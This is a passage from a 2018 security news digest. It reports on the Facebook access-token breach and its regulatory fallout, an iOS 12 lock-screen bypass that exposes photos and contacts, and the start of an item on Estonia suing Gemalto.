Another noteworthy issue is that the exposed tokens can be used not only to access Facebook accounts, but also third-party apps that use Facebook login. However, the risk should be eliminated now that the existing tokens have been reset.

Users who have linked Facebook to an Instagram account will need to unlink and relink their accounts due to the tokens being reset. Facebook clarified that WhatsApp is not impacted.

Facebook is alerting users whose tokens have been compromised by sending notifications to their accounts. In some cases, users can check if their accounts were actually hacked by accessing the “Security and Login” page from the Settings menu. However, access is only logged if the attacker created a full web session.

Incident timeline and information on attackers

Facebook discovered the breach following an investigation that started on September 16, after it noticed a traffic spike, specifically increased user access to the website. However, it only realized that it was dealing with an attack on September 25, when it also identified the vulnerability. Affected users were notified and had their access tokens reset beginning on Thursday, September 27.

As for the attackers, no information has been shared, but the social media firm did note that exploitation of the vulnerability is complex and it did require a certain skill level.

The company says it has notified the FBI and law enforcement. While the company has responded quickly after the breach was discovered, MarketWatch reports that the Data Protection Commission in Ireland, Facebook's main privacy regulator in Europe, could fine the company as much as $1.64 billion under the recently introduced GDPR.

U.S. Senator Mark R. Warner responded to news of the Facebook hack, asking for a full investigation.

“Today’s disclosure is a reminder about the dangers posed when a small number of companies like Facebook or the credit bureau Equifax are able to accumulate so much personal data about individual Americans without adequate security measures,” Sen. Warner said. “This is another sobering indicator that Congress needs to step up and take action to protect the privacy and security of social media users. As I’ve said before – the era of the Wild West in social media is over.”

FTC Commissioner Rohit Chopra wrote on Twitter that he wants answers.

Despite no evidence of harm to any user, a class action lawsuit has already been filed against Facebook in the United States.

Facebook stock fell 3 percent after the breach was disclosed.


Expert demonstrated how to access contacts and photos from a locked iPhone XS
1.10.2018 securityaffairs
Apple

Expert discovered a passcode bypass vulnerability in Apple’s new iOS version 12 that could be exploited to access photos and contacts on a locked iPhone XS.
The Apple enthusiast and “office clerk” Jose Rodriguez has discovered a passcode bypass vulnerability in Apple’s new iOS version 12 that could be exploited by an attacker with physical access to the iPhone to access photos and contacts on a locked iPhone XS and other devices.

The hack works on the latest iOS 12 beta and iOS 12 operating systems, as demonstrated by Rodriguez in a couple of videos he published on YouTube (Videosdebarraquito).

The passcode bypass vulnerability affects a number of other iPhone models including the latest model iPhone XS.

An attacker can access the images on the devices by editing a contact and changing the image associated with a specific caller.

Apple has addressed the issue allowing images to be viewed via contacts, but Rodriguez devised a new method to circumvent the mitigations implemented by Apple.

The attack abuses the VoiceOver accessibility feature; for this reason, the vulnerable device needs to have Siri enabled and Face ID either turned off or physically covered.

A step-by-step guide to Rodriguez’s attack was published by the website Gadget Hacks.

iPhone passcode bypass issues are not uncommon: in September 2015, Jose Rodriguez discovered that the iOS 9.0.1 update failed to address a lock screen bypass vulnerability.

In November 2017, experts discovered a flaw in iOS 8 and newer versions of the Apple OS that allowed bypassing the iPhone passcode protection, even when Touch ID was properly configured, and accessing photos and messages stored on the device.


Estonia sues Gemalto for 152M euros over flaws in citizen ID cards issued by the company
1.10.2018 securityaffairs
CyberSpy

Estonia sues Gemalto for 152 million euros following the security flaws in the citizen ID cards issued by the company th